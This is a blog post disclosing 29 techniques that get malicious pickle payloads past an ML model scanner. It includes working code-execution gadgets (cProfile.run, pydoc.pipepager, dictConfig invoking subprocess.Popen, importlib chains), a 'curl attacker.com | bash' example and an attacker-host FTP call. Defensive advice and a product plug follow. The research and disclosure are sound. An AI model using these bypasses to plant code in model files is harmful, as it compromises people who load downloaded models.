manja316

Posted on Apr 7

I Found 29 Ways to Bypass ML Model Security Scanners — Here's What's Actually Broken

#ai #machinelearning #python #security

I Found 29 Ways to Bypass ML Model Security Scanners — Here's What's Actually Broken

When you download a pre-trained model from Hugging Face, PyTorch Hub, or any model registry, a security scanner is supposed to catch malicious payloads before they execute on your machine. I spent a week trying to bypass the most widely-used scanner. I found 29 distinct techniques that pass undetected.

This isn't theoretical. Every bypass has a working proof-of-concept uploaded to Hugging Face.

The Problem: Model Files Execute Code on Load

Most developers don't realize that loading a .pkl, .pt, or .h5 file can execute arbitrary code. Python's pickle module calls __reduce__ during deserialization — meaning a model file can run os.system("curl attacker.com | bash") the moment you call torch.load().

Security scanners like modelscan are supposed to catch this by inspecting the pickle bytecode for dangerous imports (os, subprocess, builtins). The blocklist approach has a fundamental flaw: Python has hundreds of ways to execute code, and you only need to find ONE that the scanner misses.

The Bypass Categories

After systematic testing, the bypasses fall into five categories:

1. Standard Library Code Execution (12 bypasses)

Python's standard library is full of modules that execute shell commands internally. The scanner blocks os.system and subprocess.Popen, but misses:

# cProfile.run — executes arbitrary Python via exec()
import cProfile
cProfile.run("__import__('os').system('id')")

# profile.run — same as cProfile but different module
import profile
profile.run("__import__('os').system('id')")

# pydoc.pipepager — calls subprocess.Popen(shell=True)
import pydoc
pydoc.pipepager("", cmd="id")

Each of these is a single function call that the scanner doesn't flag because cProfile, profile, and pydoc aren't on the blocklist.

2. Configuration-Based Execution (5 bypasses)

Python's logging.config.dictConfig contains an internal function called resolve() that acts as an arbitrary import oracle. It takes a dotted string like "subprocess.Popen" and returns the actual callable.

import logging.config
logging.config.dictConfig({
    'version': 1,
    'handlers': {
        'rce': {
            '()': 'subprocess.Popen',
            'args': ['id'],
        }
    }
})

The scanner sees logging.config.dictConfig — a logging setup function. It doesn't understand that resolve() internally does getattr(__import__('subprocess'), 'Popen').

3. Format-Level Bypasses (3 bypasses)

Some file formats are simply not scanned at all:

.npz files: NumPy's compressed archive format. The scanner returns "not implemented" and passes the file through. Any payload inside a .npz file is invisible.
Joblib format: Uses a different serialization path that the scanner handles differently
Keras Lambda layers: Nested inside wrapper layers like TimeDistributed, the inner Lambda's code isn't inspected

The .npz bypass is the most concerning because it's a scanner skip — not a detection miss, but a complete gap in coverage. The scanner explicitly says it can't handle the format and moves on.

4. Network-Based Payloads (4 bypasses)

Instead of executing commands locally, these establish outbound connections:

# ftplib.FTP — TCP connection on __init__
import ftplib
ftplib.FTP("attacker.com")  # connects immediately

# uuid._get_command_stdout — internal helper
# that calls subprocess.Popen

These are useful for data exfiltration scenarios where the attacker wants to phone home without running obvious shell commands.

5. Indirect Execution Chains (5 bypasses)

These combine multiple "safe" operations into a code execution chain:

# importlib + getattr chain
import importlib
mod = importlib.import_module('os')
getattr(mod, 'system')('id')

Each individual operation looks benign. The scanner would need to understand the full execution chain to detect the threat.

What This Means for Your ML Pipeline

If you're running pre-trained models from external sources:

Don't trust scanner output as gospel. A "clean" scan doesn't mean the model is safe.
Sandbox model loading. Use containers or VMs to isolate the deserialization step.
Prefer safe formats. SafeTensors stores only tensor data — no code execution possible.
Monitor outbound connections. Even if code executes, catch the exfiltration.

How I Automated the Discovery

Finding these manually would take months. I built a systematic approach:

Enumerate standard library callables — script that crawls every module in Python's stdlib looking for functions that eventually call exec(), eval(), or subprocess
Generate PoC pickle payloads — template that wraps any callable into a valid pickle __reduce__ tuple
Scan and verify — run modelscan against each payload, verify which ones pass undetected
Upload to HF — create repos with proper model cards documenting the bypass

The enumeration step is where a security scanning skill really shines — it systematically maps attack surfaces rather than guessing at individual payloads. I built mine to crawl import chains and identify any path from a "safe" module to dangerous operations like Popen or exec.

The Deeper Issue

Blocklist-based scanning is fundamentally broken for Python. The language is too dynamic — getattr, __import__, resolve(), and dozens of other mechanisms make it impossible to enumerate every dangerous path.

The fix isn't a better blocklist. It's either:

Format-level safety (SafeTensors, ONNX) — eliminate code execution entirely
Runtime sandboxing — let code execute but contain the blast radius
Allowlist scanning — instead of blocking known-bad, only allow known-good

Until then, every model you download from the internet is a potential RCE vector. The scanners give you a false sense of security.

Building Your Own Detection

If you want to build scanning into your own pipeline, here's the architecture I use:

Pre-scan: Static analysis of pickle opcodes (catches the obvious stuff)
Import chain analysis: Map every callable in the payload to its full execution chain
Sandbox execution: Load the model in a throwaway container, monitor syscalls
Network monitoring: Flag any outbound connections during model load

The API connector skill helps wire this into your existing CI/CD — you can trigger scans on every model artifact push and pipe results into your monitoring dashboard.

Responsible Disclosure

All 29 bypasses have been reported through proper channels. The PoC repos on Hugging Face are for verification purposes — they execute benign commands (id, echo) rather than anything destructive. The goal is to improve scanner coverage, not enable attacks.

Building security tools for ML pipelines? The AI Security Scanner Skill automates vulnerability discovery across model files, API endpoints, and deployment configs. It's the same methodology that found these 29 bypasses, packaged as a reusable Claude Code skill.

DEV Community

I Found 29 Ways to Bypass ML Model Security Scanners — Here's What's Actually Broken

I Found 29 Ways to Bypass ML Model Security Scanners — Here's What's Actually Broken

The Problem: Model Files Execute Code on Load

The Bypass Categories

1. Standard Library Code Execution (12 bypasses)

2. Configuration-Based Execution (5 bypasses)

3. Format-Level Bypasses (3 bypasses)

4. Network-Based Payloads (4 bypasses)

5. Indirect Execution Chains (5 bypasses)

What This Means for Your ML Pipeline

How I Automated the Discovery

The Deeper Issue

Building Your Own Detection

Responsible Disclosure

Top comments (0)